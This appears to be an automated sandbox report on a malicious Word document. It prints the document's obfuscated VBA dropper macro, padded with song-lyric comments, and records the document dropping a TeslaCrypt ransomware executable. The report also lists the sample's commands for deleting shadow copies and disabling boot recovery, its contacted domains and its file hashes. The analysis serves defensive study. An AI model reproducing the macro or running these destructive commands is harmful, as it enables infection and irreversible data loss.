'The city that, city that went
'Yeah, not where you're born and raised
fluted = fluted / 67
'It looks like you became
'I can see it on your face, yeah, you lost it
'You got me feeling some way
'You thought you could, thought you could
peony = "bankrup"
'Hollywood, Hollywood
'A Hollywood horror
blocker = "interlingua"
'Yeah, now you're walking on, walking on
'Yeah, that's where you say you're from
End If
'A Hollywood horror
'You got me feeling some way
End Function
'All the sweet talks making you exhausted
'Make it, but the city won
Public Property Let Name(mountebank As String)
'Old fashion pass to give yourself away
'What happened to the you who's stronger
pyramid = mountebank
'Everybody's saying you're a monster
'Yeah, now you're walking on, walking on
End Property
'So I'll say this is the day you became
'Was it worth it for your name?
'So I'll say this is the day you became
'A Hollywood horror
Sub graceful(pitied, indevotion, projector)
'Your heart's all gone
'Nothing but pills and low income
Dim unhonored As Variant
'Yeah, that's where you say you're from
'Hollywood, Hollywood
Dim nursling() As Byte
'And made you go and change your ways
'Was it worth it for the fame?
Dim brit As Integer
'A Hollywood horror
'Nothing but pills and low income
nursling = beadyeyed(pitied)
'You got me feeling some way
'Nothing but ash and broken glass
billycock = "ameba"
'You got me feeling some way
'Everybody's saying you're a monster
prerequire = projector
'So give yourself away
'A Hollywood horror
Put #prerequire, , nursling
'Yeah, that's where you say you're from
'I can see it on your face, yeah, you lost it
End Sub
'The city that, city that went
'A Hollywood horror
Function giddyhead()
'Was it worth it for the fame?
'Was it worth it for your name?
Dim bey As Variant
'Yeah, now you're walking on, walking on
'Show me how you go on the floor
Dim bihar As Variant
'Nothing but pills and low income
'Nothing but pills and low income
aristocratically = LCase("ap") + Mid("outbalancepDatstropharia", 11, 4) + Left("aorites", 1)
'Nothing but ash and broken glass
'Your heart's all gone
tortured = baize
'Yeah, now you're walking on, walking on
'The city that, city that went
Dim basiliscus As Integer
'You thought you could, thought you could
'Hollywood, Hollywood
reproduce = Environ(aristocratically)
'Was it worth it for your name?
'Old fashion pass to give yourself away
baize = baize
'Nothing but pills and low income
'Show me how you go on the floor
hummock = "defamer"
'You thought you could, thought you could
'A Hollywood horror
eden = LCase("oB") & UCase("durATE")
'The city that, city that went
'Nothing but pills and low income
giddyhead = reproduce
'Yeah, now you're living on, living on
'All the sweet talks making you exhausted
baize = "fabulous"
'You got me feeling some way
'You thought you could, thought you could
End Function
'Was it worth it for the fame?
'The city that, city that went
'Show me how you go on the floor
'Yeah, not where you're born and raised
Function naysaying()
'You got me feeling some way
'Your heart's all gone
Dim mantis As Integer
'A Hollywood horror
'Yeah, not where you're born and raised
Dim tetigit As Variant
'So give yourself away
'So I'll say this is the day you became
sorrowfu = 42 + 74 - 17 + 13211
'Hollywood, Hollywood
'Yeah, now you're walking on, walking on
baize = baize
'So I'll say this is the day you became
'A Hollywood horror
'I can see it on your face, yeah, you lost it
'Old fashion pass to give yourself away
fluted = bentley * 3
'It looks like you became
'Was it worth it for your name?
'Hollywood, Hollywood
'What happened to the you who's stronger
Dim experientiagrgnothi As Variant
'Old fashion pass to give yourself away
'A Hollywood horror
functionary = 131
'All the sweet talks making you exhausted
'Yeah, now you're living on, living on
tortured = "acoustics"
'Was it worth it for the fame?
'Show me how you go on the floor
'You got me feeling some way
'Yeah, not where you're born and raised
Dim facetious As Long
'Make it, but the city won
'So give yourself away
mesopotamia = FV(sorrowfu / 124, functionary, 5)
'Hollywood, Hollywood
'Yeah, that's where you say you're from
bentley = fluted - 209
'Yeah, now you're walking on, walking on
'Yeah, not where you're born and raised
'Was it worth it for the fame?
'It looks like you became
naysaying = mesopotamia
'The city that, city that went
'A Hollywood horror
End Function
'Make it, but the city won
'Make it, but the city won
'All the sweet talks making you exhausted
'Old fashion pass to give yourself away
'Show me how you go on the floor
'Make it, but the city won
Sub centerline(canonical, menopon)
'Yeah, not where you're born and raised
'Nothing but ash and broken glass
Dim eonian As Long
'Hollywood, Hollywood
'Nothing but pills and low income
Dim harness As String
'Everybody's saying you're a monster
'The city that, city that went
tortured = baize
'You got me feeling some way
'Hollywood, Hollywood
'Nothing but pills and low income
'Was it worth it for your name?
Open canonical For Binary Access Read Write As #menopon
'Nothing but ash and broken glass
'Was it worth it for your name?
baize = baize
'All the sweet talks making you exhausted
'All the sweet talks making you exhausted
'You thought you could, thought you could
'Was it worth it for the fame?
End Sub
'All the sweet talks making you exhausted
'Show me how you go on the floor
'And made you go and change your ways
'It looks like you became
Sub FormatMyTables()
'Make it, but the city won
'A Hollywood horror
Selection.Tables(1).Style = "Light Shading - Accent 4"
'What happened to the you who's stronger
'Your heart's all gone
Selection.SelectRow
'Show me how you go on the floor
'Old fashion pass to give yourself away
Selection.Style = ActiveDocument.Styles("Heading 2")
'Yeah, now you're living on, living on
'So I'll say this is the day you became
Selection.Tables(1).Select
'Yeah, now you're walking on, walking on
'Make it, but the city won
Selection.Tables(1).AutoFitBehavior (wdAutoFitFixed)
'Show me how you go on the floor
'And made you go and change your ways
Selection.Tables(1).Rows.Alignment = wdAlignRowCenter
'And made you go and change your ways
'\xef\xbb\xbfHollywood, Hollywood
Selection.Columns.PreferredWidthType = wdPreferredWidthPoints
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
Selection.Columns.PreferredWidth = InchesToPoints(0.6)
'\xef\xbb\xbfHollywood, Hollywood
'\xef\xbb\xbfHollywood, Hollywood
End Sub"
File "preparative.frm" (Streampath: "Macros/VBA/preparative") has code: "Private Sub UserForm_Scroll(ByVal ActionX As MSForms.fmScrollAction, ByVal ActionY As MSForms.fmScrollAction, ByVal RequestDx As Single, ByVal RequestDy As Single, ByVal ActualDx As MSForms.ReturnSingle, ByVal ActualDy As MSForms.ReturnSingle)
Dim praiseworthiness As New blueblack
Dim plasma As Variant
praiseworthiness.Name = boiler
commonwealth = praiseworthiness.naysaying
ThisDocument.sempre
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF90516113836340F0.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF179A9DE8DECDEE82.TMP"
"WINWORD.EXE" created file "%TEMP%\VBE\MSForms.exd"
"WINWORD.EXE" created file "%TEMP%\~DFCDFAC6520AC83113.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF1C54A54FD69B58B4.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF73A531A31CB77CF8.TMP"
"WINWORD.EXE" created file "%TEMP%\4097074.cvr" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61158"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61158"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Launches a browser
- details
- Launches browser "firefox.exe" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 66E10000
- source
- Loaded Module
-
Spawns new processes
- details
-
Spawned process "WmiPrvSE.exe" with commandline "%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding" (Show Process)
Spawned process "glom.exe" (Show Process)
Spawned process "glom.exe" (Show Process)
Spawned process "explorer.exe" (Show Process)
Spawned process "firefox.exe" with commandline "-osint -url "%1"" (Show Process)
Spawned process "vssadmin.exe" with commandline "delete shadows /all /quiet" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "bcdedit.exe" with commandline "bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~$42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc" has type "data"
"index.dat" has type "data"
"glom.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"MSForms.exd" has type "data"
"bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Mon Aug 22 03:34:58 2016 mtime=Mon Aug 22 03:34:58 2016 atime=Mon Aug 22 12:34:12 2016 length=304164 window=hide"
"~$Normal.dotm" has type "data"
"4097074.cvr" has type "data"
"~WRS{D83B4034-8653-45F7-A933-5CC9F33E7623}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375"" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "z.rg/Y]v5:111nv[$oW}k9s&vr7o'??_\rIwX2"
Pattern match: "vai.oh/?,Xtz;0~z3p.5:l7"
Heuristic match: "3tWc^u_B8.9l^k{2S^NK.+.a9,AYuvyg86~hI=89'grK<T<1bQz[b B^e+(X8.rE"
Heuristic match: "BE`xpose0TemplateDerCustomizDP Sub UserForm_Scroll(ByVal ActionX As MSas.fm" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
File Details
inventory_list_120570.doc
- Filename
- inventory_list_120570.doc
- Size
- 297KiB (304164 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: John, Template: Normal.dot, Last Saved By: Windows, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Tue Jul 26 12:46:00 2016, Last Saved Time/Date: Tue Jul 26 13:00:00 2016, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb
- MD5
- 41c771339e87469eb71676b08f5529bf
- SHA1
- 32e7b826b41623709e91ba97724107c8d0ce35aa
Classification (TrID)
- 80.0% (.DOC) Microsoft Word document
- 20.0% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 9 processes in total (System Resource Monitor).
- WINWORD.EXE /n "C:\bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc" (PID: 2572)
-
WmiPrvSE.exe
%WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding
(PID: 3188)
-
glom.exe
(PID: 3320)
-
glom.exe
(PID: 2608)
-
explorer.exe
(PID: 2568)
-
firefox.exe
-osint -url "%1"
(PID: 2512)
- vssadmin.exe delete shadows /all /quiet (PID: 3564)
- bcdedit.exe bcdedit /set {default} recoveryenabled no (PID: 3588)
- bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures (PID: 3648)
-
firefox.exe
-osint -url "%1"
(PID: 2512)
-
explorer.exe
(PID: 2568)
-
glom.exe
(PID: 2608)
-
glom.exe
(PID: 3320)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
moatleftbet.com | - | - | - |
heheckbitont.ru | - | - | - |
meketusebet.ru | - | - | - |
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Malicious 1
-
-
glom.exe
- Size
- 84KiB (85504 bytes)
- Type
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Trojan.TeslaCrypt" (14/55)
- MD5
- 7084e51dbc1a0fc050236ccfcaa31d32
- SHA1
- a4a6ff14300b7d407aa80924d403bedc64b68270
- SHA256
- 0685daeb6a2b49d151ded5d357df1c23e4df6b4390d4e4f2771724ee167997c2
-
-
Informative 7
-
-
~$42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- bd49ca6be317810a39989450352f1b97
- SHA1
- 0c82f2892835b22ab3179fb63e5b173dfcb61fa5
- SHA256
- 66e301700c233a3ab3e0dbb11a92a252c87a77de161907a96b5138711d4a1bd5
-
index.dat
- Size
- 592B (592 bytes)
- Type
- data
- MD5
- fc210a22d52ee7c402091c1948da8513
- SHA1
- c4b21c5f402a7c62bc5f8cfc7491b0f73de74cff
- SHA256
- 353adf52110e551b529155841cab5f4fad6a4c897ab49279a4e174eeaafe957b
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- MD5
- 573227a60a3b919c043814c44ec05730
- SHA1
- a4768474829cae31bda8601464911cbe313a3e61
- SHA256
- 4a1dd1ddd3f96b28186ccaaaa7e2442c62849bde3d86fc34bf934f94b75caaea
-
bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb.LNK
- Size
- 733B (733 bytes)
- Type
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Mon Aug 22 03:34:58 2016, mtime=Mon Aug 22 03:34:58 2016, atime=Mon Aug 22 12:34:12 2016, length=304164, window=hide
- MD5
- 414d8df116de1f10b8a281f8bcbe410a
- SHA1
- 866822f8c394ca3042ee5c7b1bea758ab867c267
- SHA256
- 09f0d131208a4ddd9dbdfc00c36177756ce627183e499c0246fab1032504944b
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- bd49ca6be317810a39989450352f1b97
- SHA1
- 0c82f2892835b22ab3179fb63e5b173dfcb61fa5
- SHA256
- 66e301700c233a3ab3e0dbb11a92a252c87a77de161907a96b5138711d4a1bd5
-
4097074.cvr
- Size
- 1.7KiB (1780 bytes)
- Type
- data
- MD5
- f6404f3ce556a15be720107ac28aeb29
- SHA1
- eed905ba980341021459c1d741ad33ffc125ed1e
- SHA256
- e4019c43af68b85986e5726297917da234dd7a556827c621db93462e52626be2
-
~WRS{D83B4034-8653-45F7-A933-5CC9F33E7623}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Notifications
-
Runtime
- A process crash was detected during the runtime analysis
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Sample was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/bc42522e0ced9e1e8808cecaf3c33ad68ab97ad12312abee7ed523323714d1fb/analysis/1471837352/")